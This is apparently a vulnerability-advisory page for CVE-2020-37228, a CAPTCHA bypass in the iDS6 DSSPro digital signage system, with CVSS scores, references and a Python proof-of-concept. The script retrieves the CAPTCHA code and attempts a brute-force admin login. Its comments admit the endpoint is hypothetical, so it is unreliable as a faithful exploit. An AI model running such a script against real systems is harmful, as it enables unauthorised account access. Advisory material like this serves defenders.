Security Vulnerability Report
CVE-2020-37228 CVSS 9.8 CRITICAL

CVE-2020-37228

Published: 2026-05-16 16:16:19
Last Modified: 2026-05-18 20:16:37

Description

iDS6 DSSPro Digital Signage System 6.2 contains a CAPTCHA security bypass vulnerability that allows attackers to bypass authentication by requesting the autoLoginVerifyCode object. Attackers can retrieve valid CAPTCHA codes via the login endpoint and use them to perform brute-force attacks against user accounts.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

iDS6 DSSPro Digital Signage System 6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

target_url = "http://target-ip/login"
# Hypothetical endpoint based on description
captcha_api = "http://target-ip/api/autoLoginVerifyCode"


def exploit():
    try:
        # Request the valid CAPTCHA code directly
        print("[*] Attempting to retrieve CAPTCHA...")
        response = requests.get(captcha_api)
        if response.status_code == 200:
            # Assuming the API returns the code directly in text or JSON
            captcha_code = response.text.strip()
            print(f"[+] Retrieved CAPTCHA code: {captcha_code}")
            # Use the retrieved code to perform brute-force login
            payload = {
                "username": "admin",
                "password": "password123",  # Replace with dictionary word
                "verifyCode": captcha_code,
            }
            login_resp = requests.post(target_url, data=payload)
            if "Login successful" in login_resp.text or "dashboard" in login_resp.text:
                print("[+] Exploit successful! Authentication bypassed.")
            else:
                print("[-] Login failed. Credentials might be incorrect.")
        else:
            print(f"[-] Failed to contact CAPTCHA API. Status: {response.status_code}")
    except Exception as e:
        print(f"[!] An error occurred: {e}")


if __name__ == "__main__":
    exploit()
```

References

http://www.yerootech.com
https://www.exploit-db.com/exploits/48991
https://www.vulncheck.com/advisories/ids6-dsspro-digital-signage-system-captcha-security-bypass
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php

Record Details (from raw JSON data)

Vulnerability Status
Deferred
Weakness
CWE-307 (Improper Restriction of Excessive Authentication Attempts)
CVSS v3.1 (Primary)
9.8 CRITICAL, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (exploitability score 3.9, impact score 5.9)
CVSS v4.0 (Secondary)
9.3 CRITICAL, vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X